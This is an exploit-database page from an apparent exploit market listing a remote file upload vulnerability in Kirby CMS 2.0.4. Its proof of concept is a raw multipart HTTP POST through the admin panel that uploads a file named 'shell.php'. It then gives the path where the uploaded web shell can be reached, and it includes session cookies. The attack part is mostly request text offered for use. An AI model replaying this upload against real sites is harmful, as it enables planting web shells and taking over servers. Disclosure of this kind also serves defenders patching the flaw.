[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Kirby 2.0.4 - Remote File Upload Vulnerability

Author
ZwX
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-24413
Category
web applications
Date add
11-10-2015
Platform
php
# Title : Kirby 2.0.4 - Remote File Upload Vulnerability
# Name CMS : kirby
# Version : 2.0.4
# Author :ZwX
# Download :
# Date : 04/12/2014

-------------------------------------
          Description
-------------------------------------

The vulnerability is in the admin panel to be able to upload a shell so you have to log in as administrator.

-------------------------------------
      Proof Of Concept (PoC)
-------------------------------------

# Host: 127.0.0.1
# User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
# Accept: application/json
# Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
# Accept-Encoding: gzip, deflate
# Cache-Control: no-cache
# X-Requested-With: XMLHttpRequest
# : http://127.0.0.1/kirby-2.0.4/panel/
# Content-Length: 110842
# Content-Type: multipart/form-data; boundary=---------------------------28037442317663
# Cookie: PHPSESSID=qo2usiq27qftlslvle8vlauc90; hotlog=1; key=08cb0e14ab0f38272f427a2c7c7863e19703aa1d%2Bd033e22ae348aeb5660fc2140aec35850c4da997%7C1417695505%7C3a0bf33153da65436502fd24d239017742002e59%7CYWRtaW4%3D
# Connection: keep-alive
# Pragma: no-cache

# Method POST :
-----------------------------28037442317663\r\n
Content-Disposition: form-data; name="file"; filename="shell.php"\r\n
Content-Type: application/octet-stream\r\n
\r\n

# URL : http://127.0.0.1/kirby-2.0.4/content/2-projects/1-project-a/Shell.php

-------------------------------------
          Solution
-------------------------------------

Update the php file upload

#  0day.today [2024-06-16]  #